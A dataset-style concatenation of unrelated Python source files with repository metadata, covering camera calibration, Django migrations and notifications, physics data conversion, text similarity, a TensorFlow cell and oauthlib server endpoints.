obj_points.append(objp)
if show_corner_images == True:
img = cv2.drawChessboardCorners(img, (9, 6), corners, ret)
cv2.putText(img, img_name, (30,40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0), 2 )
cv2.imshow('Corners', img)
cv2.waitKey(250)
# CAMERA CALIBRATION
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
print("done!\nCamera calibration successfull.")
return mtx, dist
if __name__ == "__main__":
calibrate_camera(True) | [
"lukas.caup@gmx.de"
] | lukas.caup@gmx.de |
d4ef6a2a9b9e68b2b0415bead6910121e684520d | 7800e7fe29d2806696b56e172528db63b8cfa729 | /accounts/migrations/0003_talent_user.py | 7035e27bcf15cd45613a8584a79653b58a2137c2 | [] | no_license | brandondelpozo/startuptalentlive | 0f418f0f88ac871f72148bde719103d05b08e9ad | bfdffa515a86cb95193a6a90f9dce6028e705c96 | refs/heads/main | 2023-07-17T18:18:46.594514 | 2021-09-02T17:42:30 | 2021-09-02T17:42:30 | 334,286,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | # Generated by Django 3.0.6 on 2020-10-11 23:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0002_remove_talent_user'),
]
operations = [
migrations.AddField(
model_name='talent',
name='user',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"branzzel@gmail.com"
] | branzzel@gmail.com |
7138ed2a849354335f6674e80424ccc1659246e3 | 307e52d79c9068a2648ae82bbe11cd58733bba37 | /Convert/ConvertTruth.py | 2688385564e86b4c2474fb0ca6454547eb8a182e | [] | no_license | greatofdream/Recon1t | 0aa775c43dcfa5b3da7b5894e2567fbe8e7b2991 | 80e58ba3c2c23f1efa962d02fcb2205a95aa716f | refs/heads/master | 2022-11-09T14:12:55.747488 | 2020-06-09T02:43:24 | 2020-06-09T02:43:24 | 263,953,536 | 0 | 0 | null | 2020-05-14T15:31:27 | 2020-05-14T15:31:26 | null | UTF-8 | Python | false | false | 2,440 | py | # Convert ROOT file to HDF5 file
import numpy as np
import ROOT
import sys
import os
import tables
# Define the database columns
class TruthData(tables.IsDescription):
E = tables.Float64Col(pos=0)
x = tables.Float64Col(pos=1)
y = tables.Float64Col(pos=2)
z = tables.Float64Col(pos=3)
px = tables.Float64Col(pos=4)
py = tables.Float64Col(pos=5)
pz = tables.Float64Col(pos=6)
class GroundTruthData(tables.IsDescription):
EventID = tables.Int64Col(pos=0)
ChannelID = tables.Int64Col(pos=1)
PETime = tables.Float64Col(pos=2)
photonTime = tables.Float64Col(pos=3)
PulseTime = tables.Float64Col(pos=4)
dETime = tables.Float64Col(pos=5)
# Automatically add multiple root files created a program with max tree size limitation.
if len(sys.argv)!=3:
print("Wront arguments!")
print("Usage: python ConvertTruth.py MCFileName outputFileName")
sys.exit(1)
baseFileName = sys.argv[1]
outputFileName = sys.argv[2]
ROOT.PyConfig.IgnoreCommandLineOptions = True
FileNo = 0
# Create the output file and the group
h5file = tables.open_file(outputFileName, mode="w", title="OneTonDetector",
filters = tables.Filters(complevel=9))
group = "/"
# Create tables
GroundTruthTable = h5file.create_table(group, "GroundTruth", GroundTruthData, "GroundTruth")
groundtruth = GroundTruthTable.row
TruthData = h5file.create_table(group, "TruthData", TruthData, "TruthData")
truthdata = TruthData.row
# Loop for ROOT files.
t = ROOT.TChain("Readout")
tTruth = ROOT.TChain("SimTriggerInfo")
tTruth.Add(baseFileName)
t.Add(baseFileName)
# Loop for event
for event in tTruth:
for truthinfo in event.truthList:
truthdata['E'] = truthinfo.EkMerged
truthdata['x'] = truthinfo.x
truthdata['y'] = truthinfo.y
truthdata['z'] = truthinfo.z
for px in truthinfo.PrimaryParticleList:
truthdata['px'] = px.px
truthdata['py'] = px.py
truthdata['pz'] = px.pz
truthdata.append()
for PE in event.PEList:
groundtruth['EventID'] = event.TriggerNo
groundtruth['ChannelID'] = PE.PMTId
groundtruth['PETime'] = PE.HitPosInWindow
groundtruth['photonTime'] = PE.photonTime
groundtruth['PulseTime'] = PE.PulseTime
groundtruth['dETime'] = PE.dETime
groundtruth.append()
# Flush into the output file
GroundTruthTable.flush()
h5file.close()
| [
"839566105@qq.com"
] | 839566105@qq.com |
0404207e24a8631d8b813ddd8d7e3dafffc06b32 | 0415ece6fa136346b7d450e1b3d6ca83b57abbad | /pset6/similarities/similarities/helpers.py | c866cc8c8cbed3a4989e70fbbbd86d177b57845f | [] | no_license | dishiinboxru/HarvardComputerScienceFifty | b18c19cd3804ad7299665ad3b0aed7253279554a | a5fa1da7d910cb7af31caecff5efcfed05678400 | refs/heads/master | 2022-04-16T15:59:52.968918 | 2020-04-16T16:17:16 | 2020-04-16T16:17:16 | 256,265,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,220 | py | import io
from nltk.tokenize import sent_tokenize
def lines(a, b):
set1 = set()
set2 = set()
# library to work with strings
s = io.StringIO(a)
t = io.StringIO(b)
for line in s:
set1.add(line.rstrip())
for line in t:
set2.add(line.rstrip())
list1 = list(set1.intersection(set2))
# debugging output
print(list1)
return list1
def sentences(a, b):
"""Return sentences in both a and b"""
list1 = sent_tokenize(a, language='english')
print(list1)
set1 = set(list1)
list2 = sent_tokenize(b, language='english')
print(list2)
set2 = set(list2)
list3 = list(set1.intersection(set2))
print(list3)
return list3
def substrings(a, b, n):
"""Return substrings of length n in both a and b"""
set1 = set()
set2 = set()
length = int(n)
s = io.StringIO(a)
t = io.StringIO(b)
print(a)
print(b)
for i in range(0, len(a)-length+1, 1):
print(a[i:i + length])
set1.add(a[i:i + length])
for j in range(0, len(b)-length+1, 1):
print(b[j:j + length])
set2.add(b[j:j + length])
list3 = list(set1.intersection(set2))
print(list3)
return list3
| [
"dmitrii.shimanskii@griddynamics.com"
] | dmitrii.shimanskii@griddynamics.com |
ba5d12e3a9f281a603a4f3fc0b6ae61ff59e2ad6 | b05bd7c104a51910c6ed9d6f0e8d039ffa108f2b | /carros/migrations/0004_auto_20201204_2106.py | c25e4f02c0364f388b0077ad46c71811b1b44762 | [] | no_license | BrunoVittor/TesteGregory | 76e12585d4532dc8ab4836c567b5ba56469139e5 | 2c7e3afdb2a62d0464189153a9ab150d69d89083 | refs/heads/master | 2023-04-01T22:56:49.422893 | 2021-03-31T22:49:59 | 2021-03-31T22:49:59 | 334,147,980 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # Generated by Django 2.2 on 2020-12-04 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('carros', '0003_auto_20201204_2103'),
]
operations = [
migrations.AlterField(
model_name='carros',
name='ano',
field=models.IntegerField(blank=True, null=True),
),
]
| [
"bv.everit@itmss.com.br"
] | bv.everit@itmss.com.br |
1aa463d09d68651a8092b00176506f2a9cc07477 | 0a717438a8f828d5ad0ad7dffab53a4f5ecef970 | /ml_trading/ex02.py | 3b33821d52550004671ecb76744ad3e0328a431c | [] | no_license | swjo207/finance_study | 009a2ba0e27298f945bd00e8a656920050487196 | e4ed0cc5cce70781f94d82c680159b789364aea5 | refs/heads/master | 2020-12-24T19:28:06.558566 | 2016-06-01T12:14:38 | 2016-06-01T12:14:38 | 58,996,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 650 | py | import requests
from bs4 import BeautifulSoup
from stockcode import StockCode
def downloadCode(market_type):
url = 'http://datamall.koscom.co.kr/servlet/infoService/SearchIssue'
html = requests.post(url, data={'flag':'SEARCH', 'marketDisabled': 'null', 'marketBit':market_type})
return html.content
def parseCodeHTML(html, market_type):
soup = BeautifulSoup(html)
options = soup.findAll('option')
codes = StockCode()
for a_option in options:
if len(a_option) == 0:
continue
code = a_option.text[1:7]
company = a_option.text[8:]
full_code = a_option.get('value')
codes.add(market_type, code, full_code, company)
return codes
| [
"swjo207@gmail.com"
] | swjo207@gmail.com |
689fa8405d8adf818c5b3563f60186d16fa9f9f1 | 3b07655b0da227eec2db98ab9347c9e7bdbc3ffd | /scielomanager/editorialmanager/notifications.py | 076258bb112ce9c91be83ae60a0fc14ce5db7541 | [
"BSD-2-Clause"
] | permissive | scieloorg/scielo-manager | a1b7cc199e5f7c4d4b34fd81d46e180028299d7d | 0945f377376de8ef0ada83c35b4e2312062cdf45 | refs/heads/beta | 2023-07-12T08:23:59.494597 | 2017-09-28T18:39:39 | 2017-09-28T18:39:39 | 1,778,118 | 9 | 5 | BSD-2-Clause | 2023-09-05T19:42:58 | 2011-05-20T19:41:53 | Python | UTF-8 | Python | false | false | 3,509 | py | # coding: utf-8
import logging
from django.core.exceptions import ObjectDoesNotExist
from scielomanager.tools import get_users_by_group_by_collections, user_receive_emails
from scielomanager import notifications
logger = logging.getLogger(__name__)
class IssueBoardMessage(notifications.Message):
EMAIL_DATA_BY_ACTION = {
'issue_add_no_replicated_board': {
'subject_sufix': "Issue Board can't be replicated",
'template_path': 'email/issue_add_no_replicated_board.txt',
},
'issue_add_replicated_board': {
'subject_sufix': "Issue has a new replicated board",
'template_path': 'email/issue_add_replicated_board.txt',
},
}
def set_recipients(self, issue):
editor = getattr(issue.journal, 'editor', None)
if editor:
if user_receive_emails(editor):
self.recipients = [editor.email, ]
else:
logger.info("[IssueBoardMessage.set_recipients] editor (user.pk: %s) does not have a profile or decides to not receive emails." % editor.pk)
else:
logger.error("[IssueBoardMessage.set_recipients] Can't prepare a message, issue.journal.editor is None or empty. Issue pk == %s" % issue.pk)
class BoardMembersMessage(notifications.Message):
EMAIL_DATA_BY_ACTION = {
'board_add_member': {
'subject_sufix': "Member of the journal board, was added",
'template_path': 'email/board_add_member.txt',
},
'board_edit_member': {
'subject_sufix': "Member of the journal board, was edited",
'template_path': 'email/board_edit_member.txt',
},
'board_delete_member': {
'subject_sufix': "Member of the journal board, was deleted",
'template_path': 'email/board_delete_member.txt',
}
}
def set_recipients(self):
""" emails must be sent as BCC """
self.recipients = []
def set_bcc_recipients(self, member):
""" recipients must belong to the same collection as member """
collections_of_board_member = member.board.issue.journal.collections.all()
if collections_of_board_member:
librarians = get_users_by_group_by_collections('Librarian', collections_of_board_member)
else:
logger.error("[BoardMembersMessage.set_bcc_recipients] Can't define the collection of member (pk: %s), to filter bcc_recipients" % member.pk)
return
if librarians:
filtered_librarians = [librarian for librarian in librarians if user_receive_emails(librarian)]
self.bcc_recipients = map(lambda u: u.email, filtered_librarians)
else:
logger.error("[BoardMembersMessage.set_bcc_recipients] Can't prepare a message, Can't retrieve a list of Librarian Users.")
def issue_board_replica(issue, action):
message = IssueBoardMessage(action=action,)
message.set_recipients(issue)
extra_context = {'issue': issue,}
message.render_body(extra_context)
return message.send_mail()
def board_members_send_email_by_action(member, user, audit_log_msg, action):
message = BoardMembersMessage(action=action)
message.set_recipients()
message.set_bcc_recipients(member)
extra_context = {
'user': user,
'member': member,
'issue': member.board.issue,
'message': audit_log_msg,
}
message.render_body(extra_context)
return message.send_mail()
| [
"juan.funez@gmail.com"
] | juan.funez@gmail.com |
44f150c666e75aa32b284dd253d435323b5f0de0 | 7dba60ae27ff247705607839348f017b85f5da16 | /nyumbax/migrations/0010_remove_hood_user.py | 9bd48cf28d900417152b7edac6e33f76bd08d027 | [
"MIT"
] | permissive | BwanaQ/nyumba-kumi | 7edccb6745ede6d9f6faf5bd8c0dcf6e24726991 | c264b0941c77a4d7175a2dc5380723bea1acf380 | refs/heads/master | 2023-04-05T09:32:34.867456 | 2021-04-13T15:54:16 | 2021-04-13T15:54:16 | 356,136,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | # Generated by Django 3.2 on 2021-04-13 04:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('nyumbax', '0009_rename_name_hood_title'),
]
operations = [
migrations.RemoveField(
model_name='hood',
name='user',
),
]
| [
"thunjawax@gmail.com"
] | thunjawax@gmail.com |
bb7bd7965485c691b95bcf7005e93b16f68e6785 | 7fd3c972968416c27982194220e8f83f88bda99a | /Algorithms_LinkedLists/Code/566_ReshapeMatrix/v0.py | 4dc8e8d4bb77e9a4f4c635e299c5331e7412b4c6 | [] | no_license | AKHeit/LeetCode | a5093271eb1d9e27776e6b491f972be607802a72 | d91f60431aa7767d1a854e0e27a26023fc8ec45c | refs/heads/master | 2021-09-02T13:08:27.073505 | 2018-01-02T22:49:07 | 2018-01-02T22:49:07 | 113,120,000 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,395 | py | """
Problem: 566 Reshape Matrix
Level: Easy
Tags: Basic, Math
Technique: Simple Math
Status: Accepted
Problem Description:
In MATLAB, there is a very useful function called 'reshape', which can reshape a matrix into a new one with different size but keep its original data.
You're given a matrix represented by a two-dimensional array, and two positive integers r and c representing the row number and column number of the wanted reshaped matrix, respectively.
The reshaped matrix need to be filled with all the elements of the original matrix in the same row-traversing order as they were. If the 'reshape' operation with given parameters is possible and legal, output the new reshaped matrix; Otherwise, output the original matrix.
"""
class Solution(object):
"""
Solution format for LeetCode
"""
def matrixReshape(self, nums, r, c):
"""
:type nums: List[List[int]]
:type r: int
:type c: int
:rtype: List[List[int]]
"""
# Return original matrix for faulty dim
e = r * c
r0 = len(nums)
c0 = len(nums[0])
e0 = r0 * c0
if e != e0:
return nums
del e, r0, c0, e0
# Reshape original matrix into vector
array = []
for row in nums:
array = array + row
# Sort into new elements
m = [[None]*c]*r
i0 = 0
i1 = c
for row in range(r):
rn = array[i0:i1]
m[row] = rn
i0 = i1
i1 = i1 + c
return m
if __name__== "__main__":
"""
test code for terminal runs
both unit tests and full answers
"""
def print_test(ans_e,ans_o,name):
"""
prints tests in standardized format
:type ans_e: expected answer in printable format
:type ans_o: observed answer in printable format
"""
print('~'*40)
if ans_o != ans_e:
error = 1
print("########## FAIL ##########")
print("TEST: {} :: Status: FAIL".format(name))
else:
error = 0
print("TEST: {} :: Status: PASS".format(name))
print('TEST: {} :: Expected: {}'.format(method, ans_e))
print('TEST: {} :: Observed: {}'.format(method, ans_o))
return error
err = 0
sol = Solution()
# test matrixReshape 1
method = 'matrixReshape'
matrix = [[1, 2], [3, 4]]
rows = 1
columns = 4
observed_answer = sol.matrixReshape(matrix, rows, columns)
expected_answer = [[1,2,3,4]]
e = print_test(expected_answer, observed_answer,method)
err = err + e
# test matrixReshape 2
method = 'matrixReshape'
matrix = [[1, 2], [3, 4]]
rows = 4
columns = 1
observed_answer = sol.matrixReshape(matrix, rows, columns)
expected_answer = [[1], [2], [3], [4]]
e = print_test(expected_answer, observed_answer,method)
err = err + e
# test matrixReshape 3
method = 'matrixReshape'
matrix = [[1, 2], [3, 4]]
rows = 2
columns = 5
observed_answer = sol.matrixReshape(matrix, rows, columns)
expected_answer = matrix
e = print_test(expected_answer, observed_answer,method)
err = err + e
print('')
if err == 0:
print('PASSED ALL TESTS')
else:
print('FAILED A TEST: DEBUG!!!')
| [
"heitman.alexander@gmail.com"
] | heitman.alexander@gmail.com |
42ae7af6024d205e88ad2aa61c2d8c5c3a071dc3 | 92cc5c61799e93446d6562a6cc9fb74e9220c6c7 | /mac-graph/cell/mac_cell.py | a159f0e137574775b4d6c51682a27dc300eb9ca7 | [
"Unlicense"
] | permissive | houqp/mac-graph | 2728c89605b71e7ac610303e7100797787f0fa30 | ae91e5708d2a63d157a397b608acf720f4c4d840 | refs/heads/master | 2020-03-22T20:41:10.786619 | 2018-07-11T19:20:41 | 2018-07-11T19:20:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,995 | py |
import tensorflow as tf
from .read_cell import *
from .memory_cell import *
from .control_cell import *
from .output_cell import *
from ..util import *
class MACCell(tf.nn.rnn_cell.RNNCell):
def __init__(self, args, features, question_state, question_tokens, vocab_embedding):
self.args = args
self.features = features
self.question_state = question_state
self.question_tokens = question_tokens
self.vocab_embedding = vocab_embedding
super().__init__(self)
def __call__(self, inputs, state):
"""Run this RNN cell on inputs, starting from the given state.
Args:
inputs: **Unused!** `2-D` tensor with shape `[batch_size, input_size]`.
state: if `self.state_size` is an integer, this should be a `2-D Tensor`
with shape `[batch_size, self.state_size]`. Otherwise, if
`self.state_size` is a tuple of integers, this should be a tuple
with shapes `[batch_size, s] for s in self.state_size`.
scope: VariableScope for the created subgraph; defaults to class name.
Returns:
A pair containing:
- Output: A `2-D` tensor with shape `[batch_size, self.output_size]`.
- New state: Either a single `2-D` tensor, or a tuple of tensors matching
the arity and shapes of `state`.
"""
in_control_state, in_memory_state = state
out_control_state = control_cell(self.args, self.features,
in_control_state, self.question_state, self.question_tokens)
read = read_cell(self.args, self.features,
in_memory_state, out_control_state, self.vocab_embedding)
out_memory_state = memory_cell(self.args,
in_memory_state, read, out_control_state)
output = output_cell(self.args, self.features,
self.question_state, out_memory_state)
return output, (out_control_state, out_memory_state)
@property
def state_size(self):
"""
Returns a size tuple (control_state, memory_state)
"""
return (self.args["bus_width"], self.args["bus_width"])
@property
def output_size(self):
return self.args["answer_classes"]
| [
"david@sketchdeck.com"
] | david@sketchdeck.com |
24a2295b2bcd8c27d0e2679b57d06861944a3c4c | fb5d1d93c7432912f7f5e1d9ff50309f49bf6b16 | /computeIonpairstat.py | 4759b29657ec89821751cf212070247ea465b370 | [] | no_license | Eileencaraway/Joyjit-s-Python-Script | 0089635bdd8609d9ae28aa03f0029304d16542b0 | 48c29fa7f1a0060b7fc5b791ce635e1ecdeb2e98 | refs/heads/master | 2021-09-20T15:21:14.717982 | 2018-08-11T06:56:57 | 2018-08-11T06:56:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,234 | py | #!/usr/bin/env python
import sys
import os
import StringIO
import math
import numpy
from numpy import *
from histogram import *
#####################################################################################
#####################################################################################
"""
The script computes ratio of free ions and single paired ions from "Li-TFSIindex.dat"
and "MPPY-TFSIindex.dat"
"""
#####################################################################################
#####################################################################################
if(len(sys.argv)<6) :
sys.stderr.write('Usage : -input tmin tmax dt')
print
exit()
carg =1
tsave=0.01
tot_peo=0
nm_peo=0
tot_li=0
tot_mppy=0
tot_tfsi=0
for word in sys.argv[1:]:
if word[0] == "-":
if word == "-input":
carg += 1
ifile = open(sys.argv[carg])
param = ifile.readlines()
tot_peo = int(param[0])
nm_peo = int(param[1])
tot_li = int(param[2])
tot_mppy = int(param[3])
tot_tfsi = int(param[4])
carg +=1
if word == "-dgamma":
carg +=1
tsave = float(sys.argv[carg])
carg +=1
tmin = float(sys.argv[carg])
carg +=1
tmax = float(sys.argv[carg])
carg +=1
dt = float(sys.argv[carg])
carg +=1
###
def readIonPairs(indat, arr, tot_cats):
data = indat.readlines()
indat.close()
for j in range(0, len(data)):
if not (data[j].startswith("#") or data[j].startswith("\n")) :
tmp = fromstring(data[j],sep=" ")
# store values in arr
ln = int(floor((tmp[0]-tmin+0.000001)*tot_cats/tsave + tmp[1]));
#print ln, tmp[0], tmp[1],
for c in range(2, len(tmp)):
arr[int(tmp[c])][ln] = 1
#print int(tmp[c]),
#print
return 0
#################################################################################
""" reading data files Li-TFSIindex.dat and MPPY-TFSIindex.dat """
#################################################################################
tvals = int(floor((tmax-tmin+0.000001)/tsave) + 1)
tvalswli = tvals*tot_li
tvalswmy = tvals*tot_mppy
tfsiwli = [zeros(tvalswli) for i in range(tot_tfsi)]
tfsiwmy = [zeros(tvalswmy) for i in range(tot_tfsi)]
sys.stderr.write('# rows: '+str(tvalswli)+' '+str(tvalswmy)+'\n')
f1 = open('Li-TFSIindex.dat')
readIonPairs(f1, tfsiwli, tot_li)
if tot_mppy > 0:
f2 = open('MPPY-TFSIindex.dat')
readIonPairs(f2, tfsiwmy, tot_mppy)
#################################################################################
""" computing free and paired ions """
#################################################################################
hfli = Histogram(-0.5, tot_li-0.5, tot_li)
hbli = Histogram(-0.5, tot_li-0.5, tot_li)
hftfsi = Histogram(-0.5, tot_tfsi-0.5, tot_tfsi)
hbtfsi = Histogram(-0.5, tot_tfsi-0.5, tot_tfsi)
if tot_mppy > 0:
hfmppy = Histogram(-0.5, tot_mppy-0.5, tot_mppy)
hbmppy = Histogram(-0.5, tot_mppy-0.5, tot_mppy)
fli = pli = ftfsi = ptfsi = fmppy = pmppy = 0
count = 0.0
t = tmin
while(t<tmax-dt+0.00001):
hfli.reset()
hbli.reset()
hftfsi.reset()
hbtfsi.reset()
if tot_mppy > 0:
hfmppy.reset()
hbmppy.reset()
ivals = 0.0
tit = t
while(tit<t+dt+0.00001):
ng_li = [0 for i in range(tot_li)]
ng_my = [0 for i in range(tot_mppy)]
tsli = int(floor((tit-tmin+0.000001)*tot_li/tsave))
tsmy = int(floor((tit-tmin+0.000001)*tot_mppy/tsave))
for i in range(tot_tfsi):
ng_ti = 0
for j in range(tot_li):
if tfsiwli[i][tsli+j] > 0.99:
ng_li[j] += 1
ng_ti += 1
for j in range(tot_mppy):
if tfsiwmy[i][tsmy+j] > 0.99:
ng_my[j] += 1
ng_ti += 1
if ng_ti == 0:
hftfsi.store(i)
if ng_ti == 1:
hbtfsi.store(i)
for i in range(tot_li):
if ng_li[i] == 0:
hfli.store(i)
if ng_li[i] == 1:
hbli.store(i)
for i in range(tot_mppy):
if ng_my[i] == 0:
hfmppy.store(i)
if ng_my[i] == 1:
hbmppy.store(i)
ivals += 1.0
tit += tsave
for i in range(tot_li):
if (hfli.n[i]/ivals) > 0.9999:
fli += 1
if (hbli.n[i]/ivals) > 0.9999:
pli += 1
for i in range(tot_tfsi):
if (hftfsi.n[i]/ivals) > 0.9999:
ftfsi += 1
if (hbtfsi.n[i]/ivals) > 0.9999:
ptfsi += 1
for i in range(tot_mppy):
if (hfmppy.n[i]/ivals) > 0.9999:
fmppy += 1
if (hbmppy.n[i]/ivals) > 0.9999:
pmppy += 1
count += 1.0
t += tsave
###
print dt, fli/tot_li/count, pli/tot_li/count, ftfsi/tot_tfsi/count, ptfsi/tot_tfsi/count,
if tot_mppy > 0:
print fmppy/tot_mppy/count, pmppy/tot_mppy/count,
print
| [
"noreply@github.com"
] | Eileencaraway.noreply@github.com |
adff1f364ab90a5fe4e91a4602dacc1549f8b535 | 5d189a062dc0118c9c5915264d9646d6f747e08f | /oauthlib/oauth2/rfc6749/endpoints/pre_configured.py | c2f33afd68a4a2c2e68970663c3f6e0729e007ec | [] | no_license | Zhuoli/SocialComp.HW3 | a19a4c930e2976d7043ddd42c778857737e45c55 | 3a178328c99ef38fe0ab0c10955d73363d2e2bfd | refs/heads/master | 2020-04-28T13:33:31.017149 | 2013-11-14T15:33:44 | 2013-11-14T15:33:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,066 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
"""
oauthlib.oauth2.rfc6749
~~~~~~~~~~~~~~~~~~~~~~~
This module is an implementation of various logic needed
for consuming and providing OAuth 2.0 RFC6749.
"""
from ..tokens import BearerToken
from ..grant_types import AuthorizationCodeGrant
from ..grant_types import ImplicitGrant
from ..grant_types import ResourceOwnerPasswordCredentialsGrant
from ..grant_types import ClientCredentialsGrant
from ..grant_types import RefreshTokenGrant
from .authorization import AuthorizationEndpoint
from .token import TokenEndpoint
from .resource import ResourceEndpoint
class Server(AuthorizationEndpoint, TokenEndpoint, ResourceEndpoint):
"""An all-in-one endpoint featuring all four major grant types."""
def __init__(self, request_validator, token_expires_in=None,
token_generator=None, *args, **kwargs):
auth_grant = AuthorizationCodeGrant(request_validator)
implicit_grant = ImplicitGrant(request_validator)
password_grant = ResourceOwnerPasswordCredentialsGrant(request_validator)
credentials_grant = ClientCredentialsGrant(request_validator)
refresh_grant = RefreshTokenGrant(request_validator)
bearer = BearerToken(request_validator, token_generator,
expires_in=token_expires_in)
AuthorizationEndpoint.__init__(self, default_response_type='code',
response_types={
'code': auth_grant,
'token': implicit_grant,
},
default_token_type=bearer)
TokenEndpoint.__init__(self, default_grant_type='authorization_code',
grant_types={
'authorization_code': auth_grant,
'password': password_grant,
'client_credentials': credentials_grant,
'refresh_token': refresh_grant,
},
default_token_type=bearer)
ResourceEndpoint.__init__(self, default_token='Bearer',
token_types={'Bearer': bearer})
class WebApplicationServer(AuthorizationEndpoint, TokenEndpoint, ResourceEndpoint):
"""An all-in-one endpoint featuring Authorization code grant and Bearer tokens."""
def __init__(self, request_validator, token_generator=None,
token_expires_in=None, **kwargs):
"""Construct a new web application server.
:param request_validator: An implementation of oauthlib.oauth2.RequestValidator.
:param token_generator: A function to generate a token from a request.
:param kwargs: Extra parameters to pass to authorization endpoint,
token endpoint and resource endpoint constructors.
"""
auth_grant = AuthorizationCodeGrant(request_validator)
refresh_grant = RefreshTokenGrant(request_validator)
bearer = BearerToken(request_validator, token_generator,
expires_in=token_expires_in)
AuthorizationEndpoint.__init__(self, default_response_type='code',
response_types={'code': auth_grant},
default_token_type=bearer)
TokenEndpoint.__init__(self, default_grant_type='authorization_code',
grant_types={
'authorization_code': auth_grant,
'refresh_token': refresh_grant,
},
default_token_type=bearer)
ResourceEndpoint.__init__(self, default_token='Bearer',
token_types={'Bearer': bearer})
class MobileApplicationServer(AuthorizationEndpoint, ResourceEndpoint):
"""An all-in-one endpoint featuring Implicit code grant and Bearer tokens."""
def __init__(self, request_validator, token_generator=None,
token_expires_in=None, **kwargs):
implicit_grant = ImplicitGrant(request_validator)
bearer = BearerToken(request_validator, token_generator,
expires_in=token_expires_in)
AuthorizationEndpoint.__init__(self, default_response_type='token',
response_types={'token': implicit_grant},
default_token_type=bearer)
ResourceEndpoint.__init__(self, default_token='Bearer',
token_types={'Bearer': bearer})
class LegacyApplicationServer(TokenEndpoint, ResourceEndpoint):
"""An all-in-one endpoint featuring Resource Owner Password Credentials grant and Bearer tokens."""
def __init__(self, request_validator, token_generator=None,
token_expires_in=None, **kwargs):
password_grant = ResourceOwnerPasswordCredentialsGrant(request_validator)
refresh_grant = RefreshTokenGrant(request_validator)
bearer = BearerToken(request_validator, token_generator,
expires_in=token_expires_in)
TokenEndpoint.__init__(self, default_grant_type='password',
grant_types={
'password': password_grant,
'refresh_token': refresh_grant,
},
default_token_type=bearer)
ResourceEndpoint.__init__(self, default_token='Bearer',
token_types={'Bearer': bearer})
class BackendApplicationServer(TokenEndpoint, ResourceEndpoint):
"""An all-in-one endpoint featuring Client Credentials grant and Bearer tokens."""
def __init__(self, request_validator, token_generator=None,
token_expires_in=None, **kwargs):
credentials_grant = ClientCredentialsGrant(request_validator)
bearer = BearerToken(request_validator, token_generator,
expires_in=token_expires_in)
TokenEndpoint.__init__(self, default_grant_type='client_credentials',
grant_types={'client_credentials': credentials_grant},
default_token_type=bearer)
ResourceEndpoint.__init__(self, default_token='Bearer',
token_types={'Bearer': bearer})
| [
"ruanqizhen@gmail.com"
] | ruanqizhen@gmail.com |
7a6721be75418ccf2e20180da4156ca261b1a8a8 | 7573f7485a5039f6374d5740009cc33ecf83ef62 | /lishengchun/uploadsets.py | 278e553db694d23144ae2d88742e55d0574ca6a1 | [] | no_license | hugleecool/lishengchun | 5323eb851b7d8b007655f2e2d1ba92026861a134 | 7c1ebb4bc746320f3c7605045a8300220c97cb39 | refs/heads/master | 2021-01-18T13:22:36.737105 | 2014-02-15T10:58:29 | 2014-02-15T10:58:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109 | py | # coding: utf-8
from flask.ext.uploads import UploadSet, IMAGES
workimages = UploadSet('workimages', IMAGES) | [
"hustlzp@qq.com"
] | hustlzp@qq.com |
8113e1b93465b1d107bce5ef77cae82100458f29 | e08bc87afbc165ed0cd27afe2c7908323e08cd8b | /blogs/urls.py | 18127f13d374ebe6529a203214700d2a661a6a70 | [] | no_license | Code-Institute-Submissions/mcranter-Pwdr-Brand_JulyResub | 6060c341e973253a3a45d5df0d3dbe3e4581b811 | 6d9d1f347fd31b34d64f184a540b22ea0b3bba33 | refs/heads/master | 2023-07-01T09:19:28.618767 | 2021-07-25T11:54:03 | 2021-07-25T11:54:03 | 390,705,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | from django.contrib import admin
# Register your models here.
from . import views
from django.urls import path
urlpatterns = [
path("", views.post, name="blogs"),
path("detail/<slug:slug>/", views.post_detail, name="post_detail"),
path("add_blog/", views.add_post, name="add_post"),
path("edit_blog/<slug:slug>/", views.edit_post, name="edit_post"),
path("delete_blog/<slug:slug>/", views.delete_post, name="delete_post"),
]
| [
"mcranter@gmail.com"
] | mcranter@gmail.com |
d102939de5fab1bba6d0f25bad66b355c377e36b | 3d7cd241d86da789528ebd18cd436932b52f136e | /complaints/urls.py | 04620e0d9c8699d2ad910ec6ab4a5df3d5b3eeb0 | [] | no_license | Arpit-X/ACL | 323bd09228abd61acf785f7eb627d8b1b29ce35a | 3d116e2c03f737caa676bd35bac1945e0e304d8b | refs/heads/master | 2020-04-26T07:52:55.267484 | 2019-03-03T12:21:38 | 2019-03-03T12:21:38 | 173,406,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from complaints import views
router = DefaultRouter()
router.register(r'', views.ComplaintViewset)
urlpatterns = [
path('', include(router.urls)),
] | [
"arpit.gupta@ibigroup.com"
] | arpit.gupta@ibigroup.com |
